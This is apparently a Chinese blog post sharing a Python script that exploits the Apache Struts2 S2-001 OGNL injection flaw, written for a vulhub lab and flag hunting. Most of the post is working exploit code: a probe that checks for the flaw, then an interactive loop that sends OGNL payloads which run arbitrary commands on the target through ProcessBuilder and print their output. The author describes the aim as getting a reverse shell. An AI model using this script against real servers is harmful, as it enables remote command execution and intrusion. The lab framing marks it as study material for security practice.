s2系列————s2-001叙利亚版本一键化操作

s2-001叙利亚版本一键化操作
s2-001漏洞 不过多介绍，使用vulhub搭建相应靶场即可，在linux下正常运行，在windows下有可能出现状态码为500的可能，在请求头中增加Content-Type:application/x-www-form-urlencoded属性值即可正常返回，本脚本使用python编写，回显过程中，会出现些问题，包括，jssionid未过滤，命令回显字母缺失等问题，故称：叙利亚版本
右边为实际值，左边为脚本输出值，看的 这个还是有蛮大区别的，但是命令回显肯定正常执行，用这个脚本的目的就是反弹shell，毕竟要查找相应flag文件
代码如下

import requests
from urllib import parse
import difflib



def mingling(url, headers):
    shell = input("请输入你想执行的命令：")
    if "exit" in shell:
        print("程序执行完毕")
    else:
        zhixing(shell, url, headers)
        shifou = input("是否要继续执行命令（1/0）")
        if "1" in shifou:
            mingling(url, headers)
        else:
            print("程序结束")

def yanzheng(url):
    data = "username=200&password=%25%7b%32%32%32%30%2b%32%7d"
    url = url + "login.action"
    headers={
    "Referer": url,
    "Content-Type": "application/x-www-form-urlencoded"
    }
    re=requests.post(url,data=data,headers=headers).content.decode("utf-8")
    if "2222" in re:
        print("目标存在s2-001漏洞")
        mingling(url,headers)
    else:
        print("不存在相关漏洞")



def zhixing(shell,url,headers):
        if " " in shell:
            shell = shell.split(" ")
            print(len(shell))
            a = 0
            c = ""
            for i in shell:
                if a < len(shell) - 1:
                    c = c + '"' + shell[a] + '"'
                    c = c + ','
                else:
                    c = c + '"' + shell[a] + '"'

                a = a + 1
        else:
            c = '"' + shell + '"'
        str1 = '%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{""})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}'
        str2 = '%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{' + c + '})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}'
        data1='username=200&password='+parse.quote(str1)
        data2 = 'username=200&password=' + parse.quote(str2)

        res1 = requests.post(url, data=data1,headers=headers).content

        res2 = requests.post(url, data=data2,headers=headers).content
        res1 = str(res1)
        res2 = str(res2)

        if "-" in res1:
            res1=res1.replace("-","￥")
        if "\\x00" in res2:
            res2=res2.replace("\\x00","").replace("-","￥")
        a = ''.join(list(difflib.Differ().compare(res2, res1)))
        b = a.split(" ")
        while '' in b:
            b.remove('')

        i = -1
        print(">>>:", end="")
        x = ""
        for c in b:
            i = i + 1
            if "-" in c:
                d = i + 1
                if "-" in b[d]:
                    a = b[d].replace("-", "").replace("+", "")
                    x = x + a
                else:
                    a = b[d].replace("&", "-").replace("+", "")
                    x = x + a

        if "\\n" in x:
            y = x.split("\\n")
            while '' in y:
                y.remove('')
            for z in y:
                print(z.replace("￥", "-") + "  ", end="")
                print("")

        else:
            print(x)


if __name__ == '__main__':
    url = input("请输入想要测试的网址：")
    yanzheng(url)

欢迎各位大佬指正